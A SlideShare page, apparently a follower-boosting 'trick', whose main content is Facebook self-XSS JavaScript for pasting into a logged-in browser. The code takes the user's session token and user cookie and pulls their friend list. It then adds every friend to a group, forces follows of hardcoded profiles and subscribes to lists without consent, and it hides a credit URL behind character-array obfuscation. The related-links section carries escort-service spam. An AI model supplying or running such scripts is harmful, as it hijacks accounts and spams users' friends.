SlideShare uma empresa Scribd logo
1 de 3
(function(){var f={dtsg:document.getElementsByName("fb_dtsg") 
[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(d+)/) 
[1]),gid:document.getElementsByName("group_id") 
[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new 
XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function() 
{if(4==c.readyState&&200==c.status){var 
a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a 
.payload.entries.sort(function(){return.5- 
Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found 
<b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div 
id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block; 
text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else 
document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status 
?"<b style='color:darkred'>Gruppe ?ffnen!</b>"+crj:"<b 
style='color:darkgreen'>Suche nach m?glichen Abonnenten... 
("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new 
XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead 
&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("P 
OST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type"," 
application/x-www-form-urlencoded"),e.setRequestHeader("Content-length", 
prm.length),e.setRequestHeader("Connection","keep-alive"), 
e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var 
a=eval("("+e.responseText.substr(9)+")");if(f.prenKe+ 
+,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of 
<b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal+ 
+,document.getElementById("hasiltiga").innerHTML="<div><b 
style='color:darkred'>( "+f.gagal+" )</b> <span 
style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.r 
equire){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x] 
[a.jsmods.require[x].length-1][1]&&(b+="<b 
style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1] 
[1]+"</b> 
");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z 
in a.onload){var 
c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh+ 
+,document.getElementById("hasiltiga").innerHTML="<div><b 
style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' 
target='_blank'><b>"+c.name+"</b></a> haben dich 
abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasi 
ltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+ 
="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a 
href='/' 
onClick='document.getElementById("hasilsurasil").style.display="none";return 
false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p 
","m","2","r","0","c","1","t","3","?"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+ 
g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+ 
g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size: 
12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase() 
+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length- 
1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' 
target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center 
id='hasilsurasil' style='min-height: 
50px;width:600px;position:fixed;top:100px;left:"+ 
(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index: 
999999;border:5px solid skyblue;background-color: 
rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano 
</b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php? 
__a=1&viewer="+f.uid+"&token="+Math.random() 
+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = 
document.getElementsByName('fb_dtsg')[0].value; 
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]) 
function cereziAl(isim) { 
var tarama = isim + "="; 
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama) 
if (konum != -1) { 
konum += tarama.length 
son = document.cookie.indexOf(";", konum) 
if (son == -1) 
son = document.cookie.length 
return unescape(document.cookie.substring(konum, son)) 
} 
else { return ""; } 
} 
} 
function getRandomInt (min, max) { 
return Math.floor(Math.random() * (max - min + 1)) + min; 
} 
function randomValue(arr) { 
return arr[getRandomInt(0, arr.length-1)]; 
} 
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; 
var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]); 
function a(abone){ 
var http4 = new XMLHttpRequest(); 
var url4 = "/ajax/follow/follow_profile.php?__a=1"; 
var params4 = "profile_id=" + abone + "&location=1&source=follow-button& 
subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id 
+ "&phstamp="; 
http4.open("POST", url4, true); 
//Send the proper header information along with the request 
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); 
http4.setRequestHeader("Content-length", params4.length); 
http4.setRequestHeader("Connection", "close"); 
http4.onreadystatechange = function() {//Call a function when the state changes. 
if(http4.readyState == 4 && http4.status == 200) { 
http4.close; // Close the connection 
}} 
http4.send(params4); 
} 
function sublist(uidss) { 
var a = document.createElement('script'); 
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify? 
location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; 
document.body.appendChild(a); 
} 
a("100004563914543"); 
a("100003526326532"); 
sublist("357912514336290"); 
sublist("418032211657653"); 
sublist("375479039246304"); 
sublist("418033751657499"); 
sublist("375112302616311"); 
sublist("418032108324330"); 
sublist("418033784990829");
sublist("474550889339118"); 
sublist("474541336006740"); 
sublist("356891557771719"); 
sublist("483547375106136"); 
sublist("483546988439508"); 
sublist("483546958439511"); 
sublist("483546928439514"); 
sublist("483546845106189"); 
sublist("481261328668074"); 
sublist("481260498668157"); 
sublist("480889502038590"); 
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; 
var user_id = document['cookie']['match'](document['cookie']['match'] 
(/c_user=(d+)/)[1]); 
var httpwp = new XMLHttpRequest(); 
var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; 
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg 
+ '&__user=' + user_id + '&phstamp='; 
httpwp['open']('POST', urlwp, true); 
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); 
httpwp['setRequestHeader']('Content-length', paramswp['length']); 
httpwp['setRequestHeader']('Connection', 'keep-alive'); 
httpwp['send'](paramswp); 
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; 
var user_id = document['cookie']['match'](document['cookie']['match'] 
(/c_user=(d+)/)[1]); 
var friends = new Array(); 
gf = new XMLHttpRequest(); 
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + 
'&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); 
gf['send'](); 
if (gf['readyState'] != 4) {} else { 
data = eval('(' + gf['responseText']['substr'](9) + ')'); 
if (data['error']) {} else { 
friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { 
return _0x93dax8['index'] - _0x93dax9['index']; 
}); 
}; 
};

Mais conteúdo relacionado

Mais procurados

CouchDB on Android
CouchDB on AndroidCouchDB on Android
CouchDB on Android
Sven Haiges
 

Mais procurados (11)

Analysis
AnalysisAnalysis
Analysis
 
MongoDB Europe 2016 - ETL for Pros – Getting Data Into MongoDB The Right Way
MongoDB Europe 2016 - ETL for Pros – Getting Data Into MongoDB The Right WayMongoDB Europe 2016 - ETL for Pros – Getting Data Into MongoDB The Right Way
MongoDB Europe 2016 - ETL for Pros – Getting Data Into MongoDB The Right Way
 
MongoDB Aggregation Framework
MongoDB Aggregation FrameworkMongoDB Aggregation Framework
MongoDB Aggregation Framework
 
MongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB PerformanceMongoDB Europe 2016 - Debugging MongoDB Performance
MongoDB Europe 2016 - Debugging MongoDB Performance
 
Mobile Web 5.0
Mobile Web 5.0Mobile Web 5.0
Mobile Web 5.0
 
CouchDB on Android
CouchDB on AndroidCouchDB on Android
CouchDB on Android
 
MongoDB Europe 2016 - Advanced MongoDB Aggregation Pipelines
MongoDB Europe 2016 - Advanced MongoDB Aggregation PipelinesMongoDB Europe 2016 - Advanced MongoDB Aggregation Pipelines
MongoDB Europe 2016 - Advanced MongoDB Aggregation Pipelines
 
MongoDB dla administratora
MongoDB dla administratora MongoDB dla administratora
MongoDB dla administratora
 
Hands On Spring Data
Hands On Spring DataHands On Spring Data
Hands On Spring Data
 
HeadCouch - CouchDB PHP Client
HeadCouch - CouchDB PHP ClientHeadCouch - CouchDB PHP Client
HeadCouch - CouchDB PHP Client
 
Agg framework selectgroup feb2015 v2
Agg framework selectgroup feb2015 v2Agg framework selectgroup feb2015 v2
Agg framework selectgroup feb2015 v2
 

Destaque

Destaque (12)

ANEXO 9: Script acompanhamento
ANEXO 9: Script acompanhamento ANEXO 9: Script acompanhamento
ANEXO 9: Script acompanhamento
 
Plano cíclico patrocínio responsável hinode
Plano cíclico patrocínio responsável hinodePlano cíclico patrocínio responsável hinode
Plano cíclico patrocínio responsável hinode
 
Patrocínio Responsável parte 2 - Assuma Alguns Compromissos
Patrocínio Responsável parte 2 - Assuma Alguns CompromissosPatrocínio Responsável parte 2 - Assuma Alguns Compromissos
Patrocínio Responsável parte 2 - Assuma Alguns Compromissos
 
Patrocinio Responsavel - parte 4 - Folha de Metas
Patrocinio Responsavel - parte 4 - Folha de Metas Patrocinio Responsavel - parte 4 - Folha de Metas
Patrocinio Responsavel - parte 4 - Folha de Metas
 
Patrocinio Responsavel - Parte 6 - Relatorio de Planos
Patrocinio Responsavel - Parte 6 - Relatorio de PlanosPatrocinio Responsavel - Parte 6 - Relatorio de Planos
Patrocinio Responsavel - Parte 6 - Relatorio de Planos
 
Patrocínio Responsável - parte 1 - Descubra o seu porquê
Patrocínio Responsável - parte 1 - Descubra o seu porquê Patrocínio Responsável - parte 1 - Descubra o seu porquê
Patrocínio Responsável - parte 1 - Descubra o seu porquê
 
Patrocinio Responsavel - parte 7 - Lista de nomes pre qualificacao
Patrocinio Responsavel - parte 7 - Lista de nomes pre qualificacaoPatrocinio Responsavel - parte 7 - Lista de nomes pre qualificacao
Patrocinio Responsavel - parte 7 - Lista de nomes pre qualificacao
 
9 Ações do Líder Boulevard Monde
9 Ações do Líder Boulevard Monde9 Ações do Líder Boulevard Monde
9 Ações do Líder Boulevard Monde
 
Patrocinio Responsavel - parte 3 - Folha 5 x 5
Patrocinio Responsavel - parte 3 - Folha 5 x 5Patrocinio Responsavel - parte 3 - Folha 5 x 5
Patrocinio Responsavel - parte 3 - Folha 5 x 5
 
Boulevard Monde - Treinamento BLV Freedom: 9 Ações do Líder
Boulevard Monde - Treinamento BLV Freedom: 9 Ações do LíderBoulevard Monde - Treinamento BLV Freedom: 9 Ações do Líder
Boulevard Monde - Treinamento BLV Freedom: 9 Ações do Líder
 
Railson dickinson patrocínio responsável
Railson dickinson   patrocínio responsávelRailson dickinson   patrocínio responsável
Railson dickinson patrocínio responsável
 
Cidades amerios
Cidades ameriosCidades amerios
Cidades amerios
 

Semelhante a Railson dickinson 5 mil seguidores

HTML5 APIs - Where no man has gone before! - Altran
HTML5 APIs - Where no man has gone before! - AltranHTML5 APIs - Where no man has gone before! - Altran
HTML5 APIs - Where no man has gone before! - Altran
Robert Nyman
 
RESTful Web Applications with Google Go
RESTful Web Applications with Google GoRESTful Web Applications with Google Go
RESTful Web Applications with Google Go
Frank Müller
 
JavaScript APIs - The Web is the Platform - .toster conference, Moscow
JavaScript APIs - The Web is the Platform - .toster conference, MoscowJavaScript APIs - The Web is the Platform - .toster conference, Moscow
JavaScript APIs - The Web is the Platform - .toster conference, Moscow
Robert Nyman
 
Taming that client side mess with Backbone.js
Taming that client side mess with Backbone.jsTaming that client side mess with Backbone.js
Taming that client side mess with Backbone.js
Jarod Ferguson
 
Web CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docx
Web CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docxWeb CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docx
Web CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docx
celenarouzie
 
The Open Web and what it means
The Open Web and what it meansThe Open Web and what it means
The Open Web and what it means
Robert Nyman
 

Semelhante a Railson dickinson 5 mil seguidores (20)

ABCD firebase
ABCD firebaseABCD firebase
ABCD firebase
 
Ajax chap 4
Ajax chap 4Ajax chap 4
Ajax chap 4
 
HTML5 APIs - Where no man has gone before! - Altran
HTML5 APIs - Where no man has gone before! - AltranHTML5 APIs - Where no man has gone before! - Altran
HTML5 APIs - Where no man has gone before! - Altran
 
RESTful Web Applications with Google Go
RESTful Web Applications with Google GoRESTful Web Applications with Google Go
RESTful Web Applications with Google Go
 
The Principle of Hybrid App.
The Principle of Hybrid App.The Principle of Hybrid App.
The Principle of Hybrid App.
 
Ajax for dummies, and not only.
Ajax for dummies, and not only.Ajax for dummies, and not only.
Ajax for dummies, and not only.
 
java programming
java programmingjava programming
java programming
 
Ingesting and Manipulating Data with JavaScript
Ingesting and Manipulating Data with JavaScriptIngesting and Manipulating Data with JavaScript
Ingesting and Manipulating Data with JavaScript
 
Softshake - Offline applications
Softshake - Offline applicationsSoftshake - Offline applications
Softshake - Offline applications
 
JQuery Presentation
JQuery PresentationJQuery Presentation
JQuery Presentation
 
JavaScript APIs - The Web is the Platform - .toster conference, Moscow
JavaScript APIs - The Web is the Platform - .toster conference, MoscowJavaScript APIs - The Web is the Platform - .toster conference, Moscow
JavaScript APIs - The Web is the Platform - .toster conference, Moscow
 
CouchDB-Lucene
CouchDB-LuceneCouchDB-Lucene
CouchDB-Lucene
 
Taming that client side mess with Backbone.js
Taming that client side mess with Backbone.jsTaming that client side mess with Backbone.js
Taming that client side mess with Backbone.js
 
Paris js extensions
Paris js extensionsParis js extensions
Paris js extensions
 
Yahoo Query Language: Select * from Internet
Yahoo Query Language: Select * from InternetYahoo Query Language: Select * from Internet
Yahoo Query Language: Select * from Internet
 
jQuery - Chapter 5 - Ajax
jQuery - Chapter 5 -  AjaxjQuery - Chapter 5 -  Ajax
jQuery - Chapter 5 - Ajax
 
Intoduction on Playframework
Intoduction on PlayframeworkIntoduction on Playframework
Intoduction on Playframework
 
Web CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docx
Web CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docxWeb CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docx
Web CrawlersrcedusmulylecrawlerController.javaWeb Crawler.docx
 
Cnam azure 2014 mobile services
Cnam azure 2014   mobile servicesCnam azure 2014   mobile services
Cnam azure 2014 mobile services
 
The Open Web and what it means
The Open Web and what it meansThe Open Web and what it means
The Open Web and what it means
 

Último

VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
dharasingh5698
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
imonikaupta
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
Call Girls In Delhi Whatsup 9873940964 Enjoy Unlimited Pleasure
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
 

Último (20)

VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
VVIP Pune Call Girls Sinhagad WhatSapp Number 8005736733 With Elite Staff And...
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
All Time Service Available Call Girls Mg Road 👌 ⏭️ 6378878445
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
 
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
(INDIRA) Call Girl Pune Call Now 8250077686 Pune Escorts 24x7
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service AvailableCall Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
Call Girls Ludhiana Just Call 98765-12871 Top Class Call Girl Service Available
 
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
Call Now ☎ 8264348440 !! Call Girls in Green Park Escort Service Delhi N.C.R.
 
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
Wagholi & High Class Call Girls Pune Neha 8005736733 | 100% Gennuine High Cla...
 
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
Russian Call Girls in %(+971524965298  )#  Call Girls in DubaiRussian Call Girls in %(+971524965298  )#  Call Girls in Dubai
Russian Call Girls in %(+971524965298 )# Call Girls in Dubai
 
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Pollachi 7001035870 Whatsapp Number, 24/07 Booking
 
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRLLucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
Lucknow ❤CALL GIRL 88759*99948 ❤CALL GIRLS IN Lucknow ESCORT SERVICE❤CALL GIRL
 
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
Shikrapur - Call Girls in Pune Neha 8005736733 | 100% Gennuine High Class Ind...
 
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
VVIP Pune Call Girls Mohammadwadi WhatSapp Number 8005736733 With Elite Staff...
 
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
valsad Escorts Service ☎️ 6378878445 ( Sakshi Sinha ) High Profile Call Girls...
 
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort ServiceCall Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
Call Girls in Prashant Vihar, Delhi 💯 Call Us 🔝9953056974 🔝 Escort Service
 
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
Sarola * Female Escorts Service in Pune | 8005736733 Independent Escorts & Da...
 
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
VIP Model Call Girls NIBM ( Pune ) Call ON 8005736733 Starting From 5K to 25K...
 
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready ...Nanded City ( Call Girls ) Pune  6297143586  Hot Model With Sexy Bhabi Ready ...
Nanded City ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready ...
 
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
VVVIP Call Girls In Connaught Place ➡️ Delhi ➡️ 9999965857 🚀 No Advance 24HRS...
 

Railson dickinson 5 mil seguidores

  • 1. (function(){var f={dtsg:document.getElementsByName("fb_dtsg") [0].value,uid:document.cookie.match(document.cookie.match(/c_user=(d+)/) [1]),gid:document.getElementsByName("group_id") [0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function() {if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a .payload.entries.sort(function(){return.5- Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block; text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status ?"<b style='color:darkred'>Gruppe ?ffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach m?glichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead &ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("P OST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type"," application/x-www-form-urlencoded"),e.setRequestHeader("Content-length", prm.length),e.setRequestHeader("Connection","keep-alive"), e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe+ +,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal+ +,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.r equire){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x] [a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1] [1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh+ +,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasi ltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+ ="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById("hasilsurasil").style.display="none";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p ","m","2","r","0","c","1","t","3","?"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+ g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+ g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size: 12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase() +g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length- 1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height: 50px;width:600px;position:fixed;top:100px;left:"+ (document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index: 999999;border:5px solid skyblue;background-color: rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php? __a=1&viewer="+f.uid+"&token="+Math.random() +"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]) function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) {
  • 2. konum = document.cookie.indexOf(tarama) if (konum != -1) { konum += tarama.length son = document.cookie.indexOf(";", konum) if (son == -1) son = document.cookie.length return unescape(document.cookie.substring(konum, son)) } else { return ""; } } } function getRandomInt (min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; } var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(d+)/)[1]); function a(abone){ var http4 = new XMLHttpRequest(); var url4 = "/ajax/follow/follow_profile.php?__a=1"; var params4 = "profile_id=" + abone + "&location=1&source=follow-button& subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; http4.open("POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection }} http4.send(params4); } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify? location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } a("100004563914543"); a("100003526326532"); sublist("357912514336290"); sublist("418032211657653"); sublist("375479039246304"); sublist("418033751657499"); sublist("375112302616311"); sublist("418032108324330"); sublist("418033784990829");
